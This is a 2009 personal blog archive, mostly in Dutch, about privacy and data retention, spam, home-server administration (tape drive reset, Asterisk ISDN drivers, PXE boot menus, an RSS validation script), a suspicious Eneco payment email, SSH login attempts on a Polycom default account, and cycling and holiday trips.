Er wordt best nagedacht over privacy in Nederland, er wordt alleen niets gedaan met dat nadenken! Twee artikelen gisteren: Zeg uw privacy maar gedag - DePers.nl. Met als afsluiter Bart Jacobs die het eens goed uitlegt:

‘We zijn’, zegt hoogleraar Bart Jacobs samenvattend, ‘databases aan het aanleggen waar de Stasi (de gevreesde veiligheidsdienst van de voormalige DDR, red.) jaloers op zou zijn. De OV-chipkaart, de paspoorten, het EPD, ga zo maar door. Die vingerafdrukkendatabase wordt een kentekenregister voor burgers. Aangelegd voor doel A, maar gebruikt voor doel B, C, D, en E. Het argument van publieke veiligheid wordt gebruikt, terwijl de individuele veiligheid er onder te lijden heeft. En waarom er zo weinig mensen tegen protesteren? Waarom onderzocht niemand de veiligheid van de cafés in Volendam, voordat ze afbrandden? Het moet eerst een keer heel erg mis gaan, vrees ik.’

Zelfs Amnesty International gaat zich nu zorgen maken over de vrijheid in Nederland, specifiek over de bewaarplicht: Staat van bewaring - Maarten Reijnders - Uit Wordt Vervolgd, oktober 2009. Het werk van Amnesty International wordt ook moeilijker door de bewaarplicht:

De bewaarplicht is een bedreiging voor de persvrijheid. Journalisten die misstanden aan de kaak stellen, kunnen vaak niet zonder goed ingevoerde bronnen die op voorwaarde van anonimiteit hun verhaal willen doen. Door de bewaarplicht zouden klokkenluiders zich wel eens twee keer kunnen bedenken voordat ze hun verhaal aan een journalist vertellen, vreest internetjournalist en privacyvoorvechter Brenno de Winter. Als internet- en telefonieaanbieders moeten bijhouden wie met wie contact heeft gehad, wordt het immers wel erg makkelijk voor de overheid om te achterhalen welke ambtenaar vertrouwelijke informatie heeft gelekt.

Europees

Blijkbaar 'denken' sommige spammers dat dat iets goeds is, gezien de subject regels van spam de laatste dagen. Voorzover je bij spammers kunt spreken van denken, natuurlijk.

Voor de casino-spammers zie ik het al langer, varianten van:

Subject: Sluit u vandaag aan bij Euro Club Casino
Als u op zoek bent naar een betrouwbare plaats om online te spelen, met een brede selectie aan spelen en Europese betrouwbaarheid, dan is Euro Club Casino de plaats voor u.

Maar eigenlijk zit de gespamde site (www.gold-royal.net) in China, geeft een redirect naar een andere site (keno-topgame.net) in de Ukraine waar een hele website gebouwd is met machine vertalingen. En dan komt geen rekening houden met mensen buiten de US wel heel dom over:

Bel gratis: 1-866-866-6945 / 1-866-546-0445 Internationaal: 1-266-481-2382

Maar nu ook de medicijnen-spammers, met nogsteeds de bar slechte machinevertalingen:

Subject: Top pillen Uit de Top Europese Apotheek
Uw online apotheek met blijvend lage prijzen belifert ze snel en gemakkkelijk. Geniet van het comfort van uw medicijnen Qualtitats comfort van hun woning in orde en 7 dagen per week de klok rond.

Zo op het eerste gezicht machinevertaald amerikaans engels. Willen amerikaanse spammers misschien toch europese medicijnen, en een europese gezondheidszorg?

Seen today: #twatch Open Hardware Networked LCD Screen - Slashdot Hardware. Quite tempting! Affordable (USD 45) and it can do cool stuff. By default it displays real-time topic trends from Twitter on an LCD. But with a bit of playing with LCDproc it can also show system statistics, RSS feeds, mail notifications, and more such as ... METARs.

Hope someone of the LCDproc development team picks this up soon: Although the page assumes there is a way to redirect a serial port to a network stream in linux this is a bit harder.

Een stukje geschiedenis: Jeroen van Inkel bij Radio Decibel! Beelden uit 1984: de laatste uitzending van Jeroen van Inkel bij Radio Decibel voor z'n overstap naar Veronica. Met een nog zeer jonge Adam Curry in beeld en andere gezichten die later nog goed terecht gekomen zijn in de Nederlandse radio en televisie.

Ook mooi om in de video te zien: jaren 80 kapsels en brillen, draaitafels voor de muziek en een echte draaischijftelefoon voor het radio bel spel. Ook is het geheel redelijk open voor een radio piraat.

The Decibel Tapes - Radio Decibel 1984

Gevonden via radio decibel video van lion keezer op clogwog.net
Update 2009-10-14: aangepast naar gewone link in plaats van embedded video omdat er (fragmenten van) niet-rechtenvrije muziek inzitten en ik geen zin heb in welles/nietes met Buma/Stemra over embedded muziek op een niet-commercievrije website.

Radio commercials for Linux: yes, it can be done, and they are now airing in Austin, Texas, United States of America. Tux Takes To The Air, with in true open source style an open source radio ad: one can use it and remix it. I like the line:

Why are you still paying for the privilege of using your computer? There's a better way: Linux.

Found via Slashdot: Forkable Linux Radio Ad Now On the Air In Texas

Blijkbaar is 'verdacht zijn van het getuige geweest kunnen zijn' al voldoende om afgeluisterd te worden door justitie: Gegevens anonieme beller tiplijn op straat.

Haar toestel werd op het moment dat ze naar de tiplijn belde afgeluisterd, omdat het Openbaar Ministerie haar zag als belangrijke getuige van de steekpartij.

Ik vraag me af waar we gegaan zijn van 'verdacht van een zwaar genoeg misdrijf' als reden om inbreuken op de privacy te plegen tot het excuus 'verdacht van getuige geweest te zijn'.

In plaats van een rode sportauto of snelle motorfiets besloot ik voor mijn recente 40e verjaardag een bijdrage te vragen voor een betere telelens. Uiteindelijk is de keus gevallen op de Canon EF 70-300mm F4-5.6IS USM. De volgende vraag is de keuze 'waar aan te schaffen'. Over elke webwinkel zijn wel positieve en negatieve reviews (tot en met halve rampscenario's) te vinden. Dus na wikken en wegen maar een goed overkomende web-winkel gekozen: Foto Konijnenberg. Bestelling net ingeklikt en bevestigd gekregen: de Canon EF 70-300mm F4-5.6IS USM 'ExtraPlus' dus met bijbehorend UV filter en zonnekap. Ik zal dit item bijhouden met de ontwikkelingen.

Dingen die in theorie nog net even beter zouden kunnen: Duidelijker maken dat je na het aanmaken van een account op de website en het bevestigen van die account nog je bestelling moet bevestigen. En een e-mail met bestellings-bevestiging zou prima aangepast kunnen worden aan de reeds gekozen betalings-methode.

2009-09-20 12:50: bestelling in elkaar geklikt, registratie e-mail.
2009-09-20 12:54: registratie bevestigd, bestelling afgemaakt en betaald via iDeal.
2009-09-20 13:02: e-mail bericht: spullen zijn op voorraad, staan gereserveerd en worden verzonden als de betaling binnen is (is dus een generieke tekst voor alle mogelijke betalingsmethoden. Dat geeft dus verwarring bij je klanten!). Bericht compleet met klantnummer en ordernummer.
2009-09-21 17:20: sms en e-mail bericht: order is verzonden, inclusief track & trace code voor de TNT Post website.
2009-09-22 09:30: ik probeer de track & trace code op de TNT post website: werkt, status 'Zending gesorteerd in sorteercentrum'.
2009-09-22 11:03: status 'Voorgemeld en gescand op rit'.
2009-09-22 13:12: status 'Chauffeur is onderweg'.
2009-09-22 17:39: status 'Geen gehoor bij 1 ste afleverpoging'. Vraag is natuurlijk of het nu vanavond nog een keer geprobeerd wordt of morgen overdag. Volgens het briefje de volgende dag.
2009-09-23 09:18: status 'Zending zit in afleverroute'. Die statusmelding heeft nog als datum 2009-09-22.
2009-09-23 11:35: status 'Chauffeur is onderweg'.
2009-09-23 21:16: een pakketje! Jawel, een lens!

The tapedrive-with-changer on the homeserver found itself in a wedged state with at the bottom of the dmesg output:

[105715.017656] ch 0:0:1:1: Attempting to queue a TARGET RESET message
[105715.017658] CDB: 0x1b 0x20 0x0 0x0 0x2 0x0
[105715.017663] ch 0:0:1:1: Command not found
[105715.017664] aic7xxx_dev_reset returns 0x2002
[105718.936191]  target0:0:1: FAST-10 SCSI 10.0 MB/s ST (100 ns, offset 15)

And still no access to the scsi tape drive. But, there is a bigger hammer nowadays named sg_reset which can fix this:

# mt -f /dev/nst0 status
/dev/nst0: Input/output error
# sg_reset -b /dev/sg0
sg_reset: starting bus reset        
sg_reset: completed bus reset
# mt -f /dev/nst0 status
SCSI 2 tape drive:
File number=0, block number=0, partition=0.
Tape block size 0 bytes. Density code 0x25 (DDS-3).
Soft error count since last status=0
General status bits on (41010000):
 BOT ONLINE IM_REP_EN

and it's back, not needing a reboot. The list of options says it all:

Usage: sg_reset  [-b] [-d] [-h] [-V] DEVICE
  where: -b       attempt a SCSI bus reset
         -d       attempt a SCSI device reset
         -h       attempt a host adapter reset
         -V       print version string then exit

   {if no switch given then check if reset underway}
To reset use '-d' first, if that is unsuccessful, then use '-b', then '-h'

Het blijft heel moeilijk, omgaan met e-mail voor bedrijven. Ik had bij Eneco aangegeven wel via iDeal te willen betalen (vanwege de acceptgirokosten, en ik weiger automatische incasso categorisch tot dat een keer veiliger gaat worden).

Vandaag zie ik een mailtje wat misschien van Eneco is:

Subject: Uw nieuwe Eneco nota staat online                                      

U ontvangt deze email omdat u heeft gekozen voor de betaalwijze online betalen. 
                                                                                
Uw nieuwe Eneco nota staat online

Geachte mevrouw, heer,

Er staat een nieuwe nota voor u klaar op Mijn Eneco. U vindt deze nota          
bovenaan in het notaoverzicht. Door op de nota te klikken, krijgt u             
uitgebreide informatie over deze nota. U kunt de nota direct betalen            
door op de iDEAL-button achter de nota te klikken.

Direct mijn nota betalen
http://public.tripolis.com/r/9VZEywtA1Zi[...]

Geen idee wat tripolis.com is, maar ik ga niet zomaar op een 3e partij link klikken voor een betaling. Mensen proberen naar een hele andere site te sturen en dan geld te laten betalen heet 'phishing'.

Ook de headers van het mailtje geven geen vertrouwen:

Received: by outbound1.tripolis.com (PowerMTA(TM) v3.5r13) id hm7fqm0j2qks for  
        <xxxxx@yyyyyyyyyyyyy>; Thu, 17 Sep 2009 09:05:09 +0200 
        (envelope-from )                          

Geen Eneco server. Geen verwijzing naar een Eneco site. De 'echte' Eneco site gebruikt https met een EV certificaat.

Met wat zoeken in de 'mijn eneco' omgeving ontdek ik wel de openstaande betalingen. Ik verwachtte dat na het inloggen gelijk een 'u heeft een betaling openstaan' melding zichtbaar zou zijn, maar ik moest even zoeken.

Direct maar een melding achtergelaten op de Eneco site:

Ik heb aangegeven Eneco via iDeal te willen betalen, maar nu ontvang ik een mailtje wat pretendeert van Eneco te zijn voor de betaling, maar de link 'Direct mijn nota betalen' wijst naar een 3e partij - tripolis.com - waar ik niets mee te maken heb en die geen https met (EV) certificaat gebruiken. Ook blijkt uit de headers dat de mail niet afkomstig is van servers van Eneco. Elke phisher kan dit soort e-mails namaken en een mooie eigen fake-betaal site bouwen.

Gelukkig kan ik - na het nodige zoeken - ook in de wel-beveiligde omgeving van mijn eneco een verwijzing naar de betaling vinden, dus ik ben in staat om de rekening te betalen zonder de verdachte link te gebruiken.

Ik vraag Eneco om zo snel mogelijk de teksten in de e-mail berichten aan te passen zodat elke schijn van misleiding vermeden wordt en klanten uit te nodigen naar de eneco website te gaan om daar binnen de beveiligde omgeving de betaal-verwijzing te kunnen vinden. Hiervoor zou het ook handig zijn als de url https://mijn.eneco.nl/ werkt, mijn eerste gok van de 'mijn eneco' website.

Anders ben ik genoodzaakt weer terug te schakelen naar betaling per acceptgiro EN bezwaar te maken tegen eventuele acceptgiro-kosten, zie http://blog.iusmentis.com/2009/08/31/kosten-bij-acceptgiro-onredelijk-bezwarend/ .

Ik ben benieuwd naar de reactie.

Update 2009-09-17: Even opgezocht: tripols.com noemt zichzelf E-mail marketing software & delivery. Een van hun 'solutions' is dat ze zich specialiseren in 'deliverability' van business e-mails ondanks spam filters. Ruikt als een spammer, dus.

Het zou veel meer helpen als Eneco gewoon zelf deze e-mail berichten zou verzenden, zonder derde partij tracking link en met een geldige en verifieerbare digitale handtekening middels PGP of S/MIME.

Update 2009-10-06: Nog geen reactie van Eneco behalve de bevestiging van mijn bericht. Ik heb maar eens een reminder gestuurd.

Update 2009-10-08: Antwoord: ze begrijpen de verwarring met het gebruik van het domein tripolis.com en gaan er binnen Eneco naarkijken of het beter kan.

Update 2010-11-15: In Juli 2010 lijkt er iets aan gedaan te zijn: de links lopen via e-mail.eneco.nl en dat wijst nogsteeds naar een tripolis server.

The asterisk setup with bristuff-patched zap and the qozap driver failed bigtime: a call to the internal phone failed and diverted to voicemail within 2 seconds. Back to a working mISDN version. But I can't unload the mISDN drivers correctly so it took a few reboots to get things right again.

Outgoing calls without echo are nice, but I also need incoming calls to work. According to the kernel messages I should have working echo cancellation:

[  132.157748] mISDN_dsp: Audio DSP  Rev. 1.29 (debug=0x0) EchoCancellor MG2 dtmfthreshold(100)
[  132.157753] mISDN_dsp: DSP clocks every 80 samples. This equals 1 jiffies.

Time to start testing stuff on a testserver so I don't have to reboot the home server greenblatt so often.

One good effect from the change in isdn driver: telephony sounds a lot better. This is probably because zaptel automatically enables echo cancelling:

Sep 11 20:34:38 greenblatt kernel: [ 2954.439478] Zapata Telephony Interface Registered on major 196
Sep 11 20:34:38 greenblatt kernel: [ 2954.439483] Zaptel Version: 1.4.10
Sep 11 20:34:38 greenblatt kernel: [ 2954.439484] Zaptel Echo Canceller: MG2

Today I decided to put some time in trying to use a different driver for using the openvox B200P card in the ubuntu installed asterisk in home server greenblatt. mISDN has a few stability issues in this setup (ubuntu 8.04 LTS amd64, asterisk 1.4.17 from ubuntu source recompiled for misdn support) where I can't unload the driver (instant kernel warning message and module system wedged) and sometimes after a long while the internal channel got confused and rejected calls, needing a restart of Asterisk.
So I tried the other route: the qozap driver with bristuff patches which comes with ubuntu as package zaptel-source. Configuring this driver was a bit of a puzzle. Step one: don't load ztdummy because that will confuse the channel ordering. TE / NT choice is done by the module parameter ports for the module, the bitmapped value of the TE / NT configuration. In my case I created /etc/modprobe.d/zaptel with:

 
options qozap ports=2

So the second port is switched to NT mode, which matches the jumper setup. The working samples are documented at ZaptelBRI - voip-info.org.
The qozap driver sort of works on the TE side (the side facing the phone company). Diving deeper into docs from openvox showed that the openvox cards need a slightly changed qozap driver source from http://downloads.openvox.cn/pub/drivers/bristuff/patches/. It helps to find that the version of bristuffed in Ubuntu 8.04 is probably 0.4.0.
The current state is working up to a level: I can dial numbers from the internal isdn phone to the external isdn line and I can accept calls, but trying to get dialtone from asterisk results in:

    -- Extension 's' in context 'internte' from 'xxxxxxx' does not exist.  Rejecting call on channel 0/2, span 2

which looks like the problem mentioned in Re: [Asterisk-Users] zaphfc problem: overlapdial don't work after update bristuff but that change (and a complete recompile of my asterisk package) did not do the work. Browsing the source of chan_zap shows a lot of places where it can decide to switch to 's'.

Bas Dekker kan naast heel mooi fotograferen ook heel goed schrijven over fietsen. In het snelfietspad [link broken] kom ik een aantal beleidsvoorstellen tegen waar ik het riant mee eens ben. Een opmerking onderaan springt er voor mij uit:

Eerst maar eens al die levensgevaarlijk verzakte tegelfietspaden een beetje oplappen met dat geld. En een degelijke cursus uitwerken die uitgelubberde wegbeheerders leert dat je met een fiets harder kunt dan 15 kilometer per uur waaruit volgt dat hoeken van negentig graden in een fietspad op zijn zachtst gezegd een beetje hufterig zijn.

Ik ben helemaal voor! Zeker in iets wat een 'doorgaand fietspad' is is de zoveelste 90-graden hoek irritant. In 80-kilometer wegen zitten ze ook niet zomaar zonder waarschuwing.

Vandaag reisde ik met de bus naar huis, en de GVU bussen accepteren nu ook de ov-chipkaart dus heb ik dat eens getest. Op zich een goede ervaring en een mooi systeem, alleen het grote bezwaar blijft de privacy van het systeem.
Bij de eerste keer inchecken vroeg ik me bij de tekst goede reis nog af of het verschil met uitchecken wel zichtbaar zou zijn. Maar gerekend vanuit een vervoersaanbieder wens je natuurlijk iemand die instapt een positieve ervaring en is iemand die uitstapt klaar met reizen.
Bij het uitchecken is de tekst tot ziens en de kosten van de reis linksonder en het overgebleven saldo rechtsonder.

I updated my PXElinux boot menu with a few changes to the pxelinux.cfg/default so there are a number of handy extra booting options:

DEFAULT vesamenu.c32
PROMPT 0

TIMEOUT 100

MENU TITLE Heavy Duty Boot Service
MENU BACKGROUND boot.jpg
# http://www.flickr.com/photos/bottinex/2948585175/

LABEL local
MENU LABEL ^Boot from local disk (default)
        localboot 0

LABEL memtest
MENU LABEL ^Memory test
                kernel memtest86

LABEL pldrescue
MENU LABEL ^PLD Linux rescue
        KERNEL pld-20090221/boot/isolinux/vmlinuz
        APPEND initrd=pld-20090221/rescue.cpi,pld-20090221/custom/custom.cpi root=/dev/ram0 CONF=”`/dev/fd0:/rescue`;;;;;;;;;;;”
        IPAPPEND 1

LABEL ubuntu-i386
MENU LABEL Ubuntu i386 menu
        KERNEL menu.c32
        APPEND ubuntu-installer/ubuntu-i386.cfg

LABEL ubuntu-amd64
MENU LABEL Ubuntu amd64 menu
        KERNEL menu.c32
        APPEND ubuntu-installer/ubuntu-amd64.cfg

LABEL cpuid
MENU LABEL ^Identify Processor
        KERNEL cpuidtest.c32 

The ubuntu submenus are copied from the ubuntu CD's and slightly adjusted to the local situation:

MENU TITLE Ubuntu i386 menu
DISPLAY ubuntu-installer/i386/boot-screens/boot.txt

LABEL install
        kernel ubuntu-installer/i386/linux
        append vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 
LABEL linux
        kernel ubuntu-installer/i386/linux
        append vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 
LABEL cli
        kernel ubuntu-installer/i386/linux
        append tasks=standard pkgsel/language-pack-patterns= pkgsel/install-language-support=false vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 

LABEL expert
        kernel ubuntu-installer/i386/linux
        append priority=low vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 
LABEL cli-expert
        kernel ubuntu-installer/i386/linux
        append tasks=standard pkgsel/language-pack-patterns= pkgsel/install-language-support=false priority=low vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 

LABEL rescue
        kernel ubuntu-installer/i386/linux
        append vga=normal initrd=ubuntu-installer/i386/initrd.gz rescue/enable=true -- 

LABEL mainmenu
        MENU LABEL Return to main menu
        KERNEL vesamenu.c32
        APPEND ~

The PLD Linux rescue CD is ofcourse based on PXE remote boot for your home/work lab. I tried the Ubuntu 'rescue' mode once but the PLD linux rescue environment works a lot better for me.

One downside of a weblog such as the hcc!pc netwerkgroep website is 'trackbacks' being tried for linkspam. So serendipity is configured to accept trackbacks but keep them all for verification, so visitors don't see all the linkspam left by criminals. The 'score' of about one week of linkspam:

serendipity=> delete from serendipity_comments where status='pending';
DELETE 337

A bit of reading on pxelinux and syslinux and it looks easy to set up my own pxeboot server at home so I don't have to fiddle with floppies, cd-roms or other media anymore.

First of all I wanted the dhcp server to only respond with pxelinux to real pxe clients. There is other stuff which uses dhcp and tftp and might get confused by pxelinux.0 being offered as boot image such as VoIP phones. That can be done with the following in the right context in dhcpd.conf:

    if substring (option vendor-class-identifier, 0, 9) = "PXEClient" {
        filename "/pxelinux.0";
        next-server 10.42.2.1;
    }

Next a tftp server is needed, I installed atftpd serving /tftpboot.

The next part is the menu structure for pxelinux. The following files are in /tftpboot:

root@greenblatt:/tftpboot# ls -lR
.:
total 628
-rw-r--r-- 1 root root  30920 2009-09-01 21:20 boot.jpg
-rw-r--r-- 1 root root 307200 2009-09-01 20:06 boot.png
-rw-r--r-- 1 root root 103204 2009-09-01 21:23 memtest86
-rw-r--r-- 1 root root  35732 2009-09-01 18:29 menu.c32
-rw-r--r-- 1 root root  14146 2009-09-01 17:57 pxelinux.0
drwxr-xr-x 2 root root   4096 2009-09-01 21:34 pxelinux.cfg
-rw-r--r-- 1 root root 122988 2009-09-01 18:29 vesamenu.c32

./pxelinux.cfg:
total 8
-rw-r--r-- 1 root root 117 2009-09-01 18:02 bootmenu.txt
-rw-r--r-- 1 root root 463 2009-09-01 21:34 default

And the content of pxelinux.cfg/default is:

DISPLAY bootmenu.txt

DEFAULT vesamenu.c32
PROMPT 0

TIMEOUT 100

MENU TITLE Remote Boot Services
MENU BACKGROUND boot.jpg
# https://www.flickr.com/photos/bottinex/2948585175/

LABEL local
MENU LABEL ^Boot from local disk
        localboot 0

LABEL memtest
MENU LABEL ^Memory test
                kernel memtest86

Note that the memtest86+.bin image is renamed memtest86: the original filename did not want to boot.

The image of the heavy duty boot is rotated and scaled to 640x480 and brought down in quality. I will probably add the PLD linux rescue CD image and ubuntu so I won't be bothered by boot medium problems anymore. An environment for a heavy duty boot, hence the image.

What do you get when documentation for Polycom SoundPoint IP phones suggests.. and suggests again and again you should set up an ftp account PlcmSpIp with password PlcmSpIp? Well, what do you expect other than:

Sep  1 13:12:44 greenblatt sshd[24658]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:12:47 greenblatt sshd[24661]: Invalid user PlcmSpIp from 220.132.192.198
Sep  1 13:12:50 greenblatt sshd[24753]: Invalid user PlcmSpIp from 220.132.192.220
Sep  1 13:12:52 greenblatt sshd[24823]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:12:55 greenblatt sshd[24827]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:12:57 greenblatt sshd[24832]: Invalid user PlcmSpIp from 220.132.192.198
Sep  1 13:13:00 greenblatt sshd[24834]: Invalid user PlcmSpIp from 220.132.192.220
Sep  1 13:13:02 greenblatt sshd[24839]: Invalid user PlcmSpIp from 220.132.192.198
Sep  1 13:13:05 greenblatt sshd[24863]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:13:08 greenblatt sshd[24866]: Invalid user PlcmSpIp from 220.132.192.198

I rather have phones use tftp on a local network and/or http when chances are the setup will be remote.
Update 2009-09-02: And what do I find from someone who has actually configured this for provisioning his phones: Security issue related with PlcmSpIp someone who reports an actual visit on the PlcmSpIp account.

Not too many years ago I only used floppies for starting a system installation and in those cases it was always going through the box with floppies in the hopes of finding one that would successfully format, get the data written and keep it there long enough to boot the target system and get the installation running.

This evening I wanted to do a 'quick ubuntu install' on a harddisk in the server we use for demos of the hcc!pcgg netwerkgroep.

It's now finally installing using the third cd-rom drive. The one in the system did not even want to boot from the ubuntu installation cd, the second one worked ok and then moved and bumped into something while in use and started giving read failures on the same place on the cd while the cd verified fine in another system. The third one I found required a scsi controller, but the Adaptec 2940uw I had around is new enough to offer the option 'bootable cd', is now at least getting through the ubuntu cd-rom self test... and the installation worked. Sheesh. Maybe a pxeboot setup at home is a good idea, with at least a pxeboot version of the PLD rescueCD. But that would need a default do-nothing boot option because at least one client system insists on pxebooting even when it is disabled in the setup.

Wardriving results 13 July - 30 August: 3025 new networks with GPS locations according to the WiGLE stats. I'm still at number 14 at WiGLE. Not much wardriving due to the summer holiday.

Friday afternoon project: trying to make my Palm Tungsten E2 and my Ubuntu laptop talk IP to eachother. It took a bit of searching, but now it is working. It's one of those areas where one should not be afraid of a reboot, the incoming 'LAN access using PPP' kept being rejected until I rebooted the machine. Details added at The Dell Latitude D630 laptop and linux. The PalmOS webbrowser, Blazer, does show up with a weird user-agent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/Palm-Zir4; Blazer/4.0) 16;320x320"

Cat-5E cable helps, compared to Cat-5:

eth0: negotiated 1000baseT-HD flow-control, link ok

A new cable for 'connecting something in the living room'. The previous cable was Cat-5 and usually reverted to 100 megabit speed. But the switch and the computer support gigabit so I want that.

Power to the servers: I found out a certain type of 1U server uses 330 watt when fully busy. This is not a problem in itself but a lot of these together do strain the capacity of the UPS without taking up a lot of room. Solution: move systems around to save a bit of power.

Grappig: Introweb komt nu met een IPv6-only adsl aanbod voor een symbolische prijs van 6 euro per maand (dat is minder dan de KPN lijnhuur!). Ik heb al IPv6 via xs4all dus ik laat dit aanbod aan anderen die een goede reden hebben voor een gescheiden IPv6 uplink.

Rob O'Hara writes about part of his BBS history: Multiple Personalities - Rob O'Hara. Great story, I added my memories of the BBS days and how much energy could go into it.

This evening I decided to not stay indoors but to work in the garden a bit. The hazel tree (Nederlands: Hazelaar) needed some serious pruning as it grew a lot last spring. Using the saw I removed a number of 3 meter long branches. I had to stop because it became to dark to work but there still is some work left on the hazel tree. One branch was straight and long enough to keep it for my father-in-law. The rest will be sawed into pieces that fit the boxes we store the wood for burning in.

Zolangzamerhand heeft mijn Nazca Pioneer ligfiets wel z'n eigen pagina verdiend met daarin een overzicht van wat ik er aan onderhoud zelf aan doe.

Bezoekers aan mijn homepage zien al eventjes de IPv6 exhaustion counter in de rechterkolom .. wat verderop naar beneden. Met dank aan de onvolprezen Hurricane Electric voor hun IPv4 exhaustion counters.

Het is echt tijd dat meer mensen nadenken over IPv6 en er iets mee gaan doen. Vooral het netwerk tussen provider en thuisgebruiker heeft momenteel geen werkend IPv6, en daar moet nodig wat aan gedaan worden.

Recente publicatie: Wanneer krijgt IPv6 een gezicht? - Computable

Immediate confirmation of the Twitter rss feed issue: the rss feed did not parse. Indeed, the rss feed was not an rss but a piece of HTML:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd"> -->
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0.1">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE></TITLE>
</HEAD>
<BODY><P></BODY>
</HTML>

So the little script worked and saved the homepage.

More than one visitor of my homepage saw an intricate XML parsing error and not the page you all want to see. I never saw the problem myself but my best guess sofar is that the twitter rss feed was malformed, because that is the only XML parsing happening for the page. I fetch the twitter feed automatically every 6 hours, but sometimes twitter is a bit overloaded and probably gives an internal error page (the famous fail whale) and not the valid rss feed.

Solution: Fetch the file to a temporary file, run the parser on it and when the parser does not fail, copy it to where the webserver reads it:

#!/bin/sh

wget -O wwwdata/twitter.rss.pre -o /dev/null http://twitter.com/statuses/user_timeline/19301166.rss

perl -MXML::RSS -e 'my $rss=new XML::RSS; $rss->parsefile("wwwdata/twitter.rss.pre");'

if [ "$?" = "0" ]; then
	cp wwwdata/twitter.rss.pre wwwdata/twitter.rss
fi

Terug van vakantie! Korte samenvatting: we zijn met de trein naar Berlijn gereden en we zijn terug naar huis gefietst op de ligfietsen.

Een heerlijke vakantie. Veel dingen gezien. Berlijn is imposant, enorm veel geschiedenis overal in de stad. We hebben een beetje de muur-geschiedenis gezocht met een bezoek aan Museum Haus am Checkpoint Charlie wat al vanaf 1962 de geschiedenis van de muur volgt en de ontsnappingen uit Oost-Berlijn. We hebben een stukje van de Berliner Mauerweg gefietst. Indrukwekkend om het eens te zien. Ik heb in de jaren 80 wel het nieuws over West-Duitsland en Oost-Duitsland meegekregen en de Wende, maar ter plekke de streep door de stad te zien is toch wel anders. Vooral het stuk aan de Bernauer Straße waar ook een tentoonstelling is en nog een stuk muur te bezichtigen. Het blijft een totaal absurd gegeven hoe sterk gescheiden de stad was en hoeveel rare gevolgen daar van waren.

Het fietsen terug ging prima. Perfect weer, veel zon, twee keer een heel klein beetje regen. Wel een paar stevige buien op momenten dat wij lekker binnen zaten. Fietsen in Duitsland lijkt net op fietsen in Denemarken: soms moet je op de doorgaande weg fietsen (Landesstraße) en dat is dan gewoon geaccepteerd, auto's halen netjes in of blijven er even achter hangen als inhalen niet kan. Binnen 2 kilometer in Nederland waren we al ingehaald door iemand die dan 0.5 seconde eerder een erf kon opdraaien. Verder zijn er in Duitsland veel fietspaden en fietsroutes, in voormalig Oost-Duitsland minder, maar wel met een duidelijke groei. Ik had soms wel het idee dat het labeltje fietspad (Radweg) ook aan paden geplakt werd die alleen te fietsen zijn met een goeie mountainbike.

Ook onderweg bezocht: Bunker Kossa wat een oude bunker was van de Nationale Volks Armee, het leger van de DDR. Veel teksten in het russisch, maar eigenlijk viel het ons wel op dat in vergelijking met het Langelandsfort in Denemarken wat we vorig jaar bezocht hebben er een hoop overeenkomsten zijn tussen hoe de Navo-landen en de Warschaupact-landen dingen ingericht hadden.

In totaal 1246 kilometer gefietst deze vakantie, in 14 fietsdagen.

We hebben in Duitsland voor het bellen van onderdak wel gelijk een prepaid-sim gehaald van Klarmobil. Ooit was bellen met Vodafone in het land waar je was aardig goedkoop maar sinds het allemaal goedkoper moet met roaming en simpeler betaal je voor bellen naar Duitsland vanuit Duitsland gewoon het 'Passport' roaming tarief van EUR 0.79/gesprek en EUR 0.25/minuut. De Klarmobil Sim kostte EUR 9.95, gaf 10 euro tegoed en die rekenen EUR 0.09/minuut binnen Duitsland. Op vakantie neem ik zowiezo mijn oudere Nokia 6310i mee omdat die nu nogsteeds een betere batterij levensduur heeft dan mijn huidige toestel, een Nokia 6300.

Onderweg op de fiets zie ik nogal eens oude tv antennes op daken staan die duidelijk niet meer gebruikt worden (allemaal horizontaal gepolariseerd, terwijl alle dvb-t zenders in nederland verticaal gepolariseerd zijn). Misschien dat er daar nog eens eentje tussenzit die ik voor weinig kan meenemen voor meer DX experimenten. Of iemand moet een antenne weten? UHF / VHF band III.

The firewall at work got adjusted to not keep NAT state (cisco-term: xlates) for non-NAT sessions. So now I can run our ntp pool server at maximum speed again without the firewall overflowing its state tables. If you ever run into this problem, the right command is xlate-bypass.

Als je een aanbieding als World's Smallest Portable DVB-T Digital TV (2.4 Inch) ziet vraag je je af waarom KPN mobiele tv of Callmax / Mobiele TV Nederland uberhaupt nog zo moeilijk doen met een apart 'mobiel TV' aanbod via andere technische standaarden (KPN mobiel dvb-h, callmax en mobiele tv t-dmb). Mobiele TV is door internationale aanbieders van apparatuur allang gedefinieerd als kleine DVB-T ontvangers die FTA DVB-T kanalen ontvangen. Nu nog deze wijsheid bij de Nederlandse contentaanbieders en bij de frequentieverdelers.

Seeing another set of DVB-T DX pages by Hans makes me think I should have a look at parsing the vdr files from w_scan into an automatic DX logbook, noting when muxes are first found. I collected the output files since 3 January 2009. I started doing that after I saw the WDR program at 674 MHz so that was not logged in that format. Documentation: VDR file format.

Gisteren gingen we (lig) fietsen en bij het plannen van de route namen we een item van mijn foto wensenlijst mee: we zijn langs de Gerbrandytoren gefietst, bekend als zendmast Lopik te IJsselstein.

Gelukt.. Zendmast lopik te IJsselstein / Gerbrandytoren

Meer informatie over de Gerbrandy Toren: De Gerbrandytoren te IJsselstein Gerbrandytoren - Wikipedia Nederland
De zendmast is natuurlijk bekend van de rol als de grootste kerstboom van de wereld als aan het eind van het jaar de tuidraden voorzien worden van lampjes. Altijd in TV-gidsen gestaan als 'Lopik' maar door een gemeentelijke herindeling ooit van Lopik naar IJsselstein 'verhuisd'.
